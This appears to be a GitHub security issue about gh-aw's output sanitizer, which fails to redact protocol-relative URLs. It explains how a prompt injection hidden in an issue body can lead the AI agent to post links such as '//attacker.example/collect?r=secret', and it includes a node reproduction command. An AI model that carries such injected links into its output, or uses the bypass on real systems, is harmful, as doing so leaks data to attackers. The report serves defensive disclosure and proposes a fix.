safe-outputs sanitizer must treat //hostname protocol-relative URLs as blocked domains #23737
Description
Summary
The safe-outputs content sanitizer in sanitize_content_core.cjs (v0.64.4) does not match protocol-relative URLs of the form //hostname/path. Both sanitizeUrlProtocols() (which requires an explicit protocol:// prefix) and sanitizeUrlDomains() (which is anchored to https://) miss this form, so //evil.com/steal passes through both filters unmodified. Because GitHub.com is served over HTTPS, a browser resolves //evil.com/steal to https://evil.com/steal, the same destination that sanitizeUrlDomains() correctly blocks when the scheme is written explicitly. This contradicts the documented control that safe-outputs restricts AI-generated content to sanitized, allowlisted URLs.
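The gap described above can be illustrated with a minimal sketch. The two regular expressions below are hypothetical stand-ins, not the actual patterns from sanitize_content_core.cjs; they only mirror the stated requirements (an explicit scheme:// prefix and an https:// anchor). The resolution step uses the standard WHATWG URL constructor available in Node.js, and the base page URL is an assumed example.

```javascript
// Hypothetical stand-ins for the two filters; the real patterns in
// sanitize_content_core.cjs are not reproduced here.
const explicitProtocol = /\b[a-z][a-z0-9+.-]*:\/\//i; // requires "scheme://"
const httpsAnchored = /https:\/\/([\w.-]+)/i;          // requires "https://"

const input = "//evil.com/steal";

// Neither pattern can match, because the input has no scheme at all.
const matchesProtocol = explicitProtocol.test(input);
const matchesHttps = httpsAnchored.test(input);

// Resolve the reference against an HTTPS page, as a browser would.
// The base URL is an assumed example of a GitHub issue page.
const resolved = new URL(input, "https://github.com/owner/repo/issues/1").href;

console.log({ matchesProtocol, matchesHttps, resolved });
```

Under these assumptions both patterns miss the input, while the resolved URL points at the evil.com host over HTTPS.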
Affected Area
Safe-outputs content sanitization — URL filtering layer (sanitize_content_core.cjs, functions sanitizeUrlProtocols ~line 178 and sanitizeUrlDomains ~line 225).
Reproduction Outline
- Configure a gh-aw workflow with safe-outputs: create-issue (or add-comment).
- Inject a protocol-relative URL into AI-generated output (e.g., via prompt injection in an issue body): [click here](//attacker.example/collect?r=secret).
- The AI includes this link in its safe-output body.
- Observe that sanitizeContentCore('[click here](//attacker.example/collect)') returns the input unchanged: the URL is not redacted.
- The GitHub API receives and stores the unsanitized link; a viewer clicking it is sent to attacker.example over HTTPS.
Direct verification:
node -e "
process.env.GITHUB_REPOSITORY = 'owner/repo';
const { sanitizeContentCore } = require(process.env.RUNNER_TEMP + '/gh-aw/safeoutputs/sanitize_content_core.cjs');
console.log(sanitizeContentCore('[click](//evil.com/steal)'));
// Expected: [click]((evil.com/redacted))
// Actual: [click](//evil.com/steal) ← not redacted
"
Observed Behavior
//evil.com/steal, [Legit link](//evil.com/steal), and the image-embed form of the same URL all pass through sanitizeContentCore() unchanged. An explicit https://evil.com/steal is correctly redacted.
Expected Behavior
Protocol-relative URLs (//hostname/path) should be treated equivalently to https://hostname/path by the domain allowlist check. Disallowed domains should be redacted to (hostname/redacted) regardless of whether the scheme is explicit or protocol-relative.
Security Relevance
The exploit chain is: cross-prompt injection payload in issue/PR content → AI includes //attacker.example/... in safe-output body → sanitizer passes it unchanged → GitHub posts the link → maintainer clicks or image auto-loads in their browser, resolving to the attacker's HTTPS server. For image embeds, GitHub's camo proxy still reveals to the attacker that the image was requested. This fully bypasses the URL domain allowlist, which is a documented and load-bearing security control.
Suggested fix: Extend sanitizeUrlProtocols to also match //hostname[/path] patterns and apply the same domain allowlist check, or normalize protocol-relative URLs to https:// before the existing sanitizeUrlDomains check. Add a regression test asserting that //evil.com/path is treated equivalently to https://evil.com/path.
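The second option (normalizing before the domain check) could look roughly like the sketch below. Every function name here (normalizeProtocolRelative, redactDisallowedDomains, sanitizeSketch) is hypothetical, and the redaction helper is a simplified stand-in for sanitizeUrlDomains, not its real implementation. The sketch assumes a hostname always contains at least one dot and that a // preceded by a colon, slash, or word character belongs to an explicit URL or a path and should be left alone.

```javascript
// Hypothetical helper: rewrite "//host..." to "https://host..." when the
// slashes are not part of an explicit "scheme://" prefix or a path.
function normalizeProtocolRelative(text) {
  return text.replace(
    /(^|[^:\w/])\/\/(?=[a-z0-9][a-z0-9.-]*\.[a-z]{2,})/gi,
    "$1https://"
  );
}

// Simplified stand-in for the domain allowlist check (an assumption, not
// the real sanitizeUrlDomains): redact https:// URLs on unlisted hosts.
function redactDisallowedDomains(text, allowedDomains) {
  return text.replace(
    /https:\/\/([a-z0-9.-]+)(\/[^\s)\]]*)?/gi,
    (match, host) => {
      const h = host.toLowerCase();
      const allowed = allowedDomains.some(
        (d) => h === d || h.endsWith("." + d)
      );
      return allowed ? match : `(${h}/redacted)`;
    }
  );
}

// Normalize first, then run the allowlist check on the result.
function sanitizeSketch(text, allowedDomains) {
  return redactDisallowedDomains(normalizeProtocolRelative(text), allowedDomains);
}

// Regression-style checks: both URL forms must be treated the same way.
const allowedDomains = ["github.com"];
const relative = sanitizeSketch("[click](//evil.com/steal)", allowedDomains);
const explicit = sanitizeSketch("[click](https://evil.com/steal)", allowedDomains);
console.log(relative === explicit, relative);
```

One side effect of this design is that protocol-relative links to allowed hosts are rewritten to explicit https:// links, which may or may not be acceptable for the real sanitizer. A plain code comment such as `x = 1; // note` is left untouched because the text after the slashes does not look like a hostname.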
gh-aw version: v0.65.0 (finding reported against v0.64.4)
Original finding: https://github.com/githubnext/gh-aw-security/issues/1646
Generated by File Issue